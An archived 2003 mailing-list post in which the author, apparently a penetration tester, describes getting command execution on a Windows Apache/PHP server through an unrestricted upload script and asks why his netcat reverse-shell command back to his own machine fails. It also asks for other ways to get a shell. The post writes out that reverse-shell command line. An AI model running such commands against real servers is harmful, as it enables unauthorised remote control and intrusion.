php and netcat?

From: Maarten (secfocus@hartsuijker.com)
Date: Tue Feb 18 2003 - 14:24:05 EST


Hi,

I am testing a Windows-based Apache server that's got PHP and MySQL
installed on it. I found a PHP script that allows uploading other PHP
scripts. The upload directory is also readable and executable. So I have
uploaded some of my own scripts and can execute any command I want using
`cmd /c command.exe`

I am looking for ways to further exploit this server. The file system is
probably "everyone full control". Have not tested that yet. What I tried to
do was use netcat to send a command shell to my own machine (cmd /c nc
333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the web server
contacts my own machine on port 333; however, I do not get a command prompt
like I am getting when running the same netcat command from the command
prompt of a Windows machine. Anyone know why?

If anyone knows an alternative to get a shell on the server, I would also
appreciate it. Of course I can run any command through PHP, but there should
be alternatives... An alternative to my netcat idea is also
appreciated }-)

maarten
